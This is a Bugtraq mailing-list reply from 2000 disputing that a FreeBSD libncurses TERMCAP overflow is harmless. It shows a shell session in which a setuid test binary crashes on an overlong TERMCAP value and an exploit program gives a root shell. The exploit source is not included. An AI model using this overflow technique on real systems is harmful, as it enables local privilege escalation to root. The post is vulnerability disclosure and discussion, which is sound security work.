[14665] in bugtraq
Re: freebsd libncurses overflow
daemon@ATHENA.MIT.EDU (Przemyslaw Frasunek)
Wed Apr 26 00:19:53 2000
Mime-Version: 1.0
Content-Type: text/plain; charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
Message-Id: <002801bfae93$5b7e69a0$0273b6d4@freebsd.lublin.pl>
Date: Tue, 25 Apr 2000 10:50:42 +0200
Reply-To: Przemyslaw Frasunek <venglin@FREEBSD.LUBLIN.PL>
From: Przemyslaw Frasunek <venglin@FREEBSD.LUBLIN.PL>
X-To: Kris Kennaway <kris@FreeBSD.org>
To: BUGTRAQ@SECURITYFOCUS.COM
> Furthermore, it is not actually a vulnerability. It seems that setuid
> programs will not accept an alternate termcap file via TERMCAP even under
> the old version of ncurses in FreeBSD 3.x. Therefore this "exploit" can
> only be used on your own binaries.
Sure?
lubi:venglin:~> uname -a
FreeBSD lubi.freebsd.lublin.pl 3.4-STABLE FreeBSD 3.4-STABLE #1: Wed Mar 1
11:18:54 CET 2000
venglin@lubi.freebsd.lublin.pl:/mnt/elite/usr/src/sys/compile/GADACZKA i386
lubi:venglin:~> cat dupa.c
main() { initscr(); }
lubi:venglin:~> cc -o d dupa.c -lncurses
lubi:venglin:~> su
s/key 76 ve15188
Password:
lubi:venglin:/home/venglin# chmod 4755 d ; chown root.wheel d
lubi:venglin:/home/venglin# exit
lubi:venglin:~> ./d
lubi:venglin:~> setenv TERMCAP `perl -e 'print "A"x5000'`
lubi:venglin:~> ./d
Segmentation fault
lubi:venglin:~> ./dupaexp 4000
ret: 0xbfbfba8c
# id
uid=0(root) gid=1001(users) groups=1001(users), 0(wheel)
Obviously, *most* binaries are dropping root privileges before using any ncurses
functions.
--
* Fido: 2:480/124 ** WWW: http://www.freebsd.lublin.pl ** NIC-HDL: PMF9-RIPE *
* Inet: venglin@freebsd.lublin.pl ** PGP: D48684904685DF43 EA93AFA13BE170BF *
